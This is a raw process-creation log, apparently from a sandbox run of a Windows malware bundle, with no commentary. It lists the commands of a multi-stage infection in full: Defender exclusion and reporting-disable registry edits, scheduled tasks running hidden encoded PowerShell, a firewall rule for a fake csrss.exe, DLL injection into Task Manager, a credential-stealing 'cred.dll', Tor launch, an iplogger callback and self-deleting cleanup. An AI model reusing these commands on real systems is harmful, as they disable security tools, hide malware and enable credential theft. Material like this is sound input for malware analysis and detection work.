C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe

"C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe"

C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe

"C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe"

C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe

"C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe"

C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe

"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe

"C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE

C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe

"C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1216 -ip 1216

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==

C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe

"C:\Users\Admin\Documents\s0NrNwyfXpxCyzS03I8CZcLq.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 452

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1216 -ip 1216

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 764

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe

"C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1216 -ip 1216

C:\Users\Admin\AppData\Local\Temp\M52CB.exe

"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 772

C:\Users\Admin\AppData\Local\Temp\M52CB.exe

"C:\Users\Admin\AppData\Local\Temp\M52CB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 816

C:\Users\Admin\AppData\Local\Temp\0BB4J.exe

"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 824

C:\Users\Admin\AppData\Local\Temp\0BB4J.exe

"C:\Users\Admin\AppData\Local\Temp\0BB4J.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1216 -ip 1216

C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 956

C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1216 -ip 1216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2284 -ip 2284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1556

C:\Users\Admin\AppData\Local\Temp\EH46E.exe

"C:\Users\Admin\AppData\Local\Temp\EH46E.exe"

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe

https://iplogger.org/1x5az7

C:\Windows\SysWOW64\taskkill.exe

taskkill /im l2S7FrWODIlvtiOh9PM4XNlS.exe /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1216 -ip 1216

C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe

"C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1744 -ip 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 2068

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe" & exit

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Kog456fPoi_qlj0gOuQ1ue72.exe" /f

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -u rMbC4.Q /S

C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe

"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

"C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe"

C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe

"C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe"

C:\ProgramData\50543188494393494002.exe

"C:\ProgramData\50543188494393494002.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3244 -ip 3244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1928

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

"C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5800 -ip 5800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 1108

C:\Windows\SysWOW64\taskkill.exe

taskkill /im FzbLA0y21wf4Eb_GXZGPAkPK.exe /f

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

"C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe" /F

C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe

"C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe"

C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe

"C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe"

C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe

"C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe"

C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe

"C:\Users\Admin\Pictures\Adobe Films\7oi_eeupjsnLrsVJ1cvYAxm7.exe"

C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe

"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe"

C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe

"C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\62eca45584\

C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe

"C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe

"C:\Users\Admin\Pictures\Adobe Films\BvEl9bplplH_zds3oc3G9TH2.exe" H

C:\Users\Admin\AppData\Local\Temp\7zSDD85.tmp\Install.exe

.\Install.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3608 -ip 3608

C:\Users\Admin\AppData\Local\Temp\0B7121CH132B0JI.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 452

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 5436 -ip 5436

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5436 -s 708

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 776

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3608 -ip 3608

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 784

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5512 -ip 5512

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 824

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3608 -ip 3608

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHbFtyKwQ" /SC once /ST 00:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1012

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHbFtyKwQ"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3608 -ip 3608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1364

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe" & exit

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Ju38t3w5U8IOhBMX5rcSC6Nn.exe" /f

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHbFtyKwQ"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Users\Admin\AppData\Local\Temp\4A1B.exe

"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe

"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"

C:\Users\Admin\AppData\Local\Temp\6DF1.exe

C:\Users\Admin\AppData\Local\Temp\6DF1.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"

C:\Users\Admin\AppVerif\DllHelper.exe

"C:\Users\Admin\AppVerif\DllHelper.exe"

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"

C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe

"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"

C:\Users\Admin\AppData\Local\Temp\7BCD.exe

C:\Users\Admin\AppData\Local\Temp\7BCD.exe

C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe

"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"

C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\8AF1.exe

C:\Users\Admin\AppData\Local\Temp\8AF1.exe

C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe

"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\987E.exe

C:\Users\Admin\AppData\Local\Temp\987E.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\CE07.exe

C:\Users\Admin\AppData\Local\Temp\CE07.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe

"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"

C:\Windows\SysWOW64\schtasks.exe

/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\3A8A.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\EF2C.exe

C:\Users\Admin\AppData\Local\Temp\F576.exe

C:\Users\Admin\AppData\Local\Temp\F576.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Users\Admin\AppData\Local\Temp\F7E8.exe

C:\Users\Admin\AppData\Local\Temp\F7E8.exe

C:\Users\Admin\AppData\Local\Temp\FB35.exe

C:\Users\Admin\AppData\Local\Temp\FB35.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

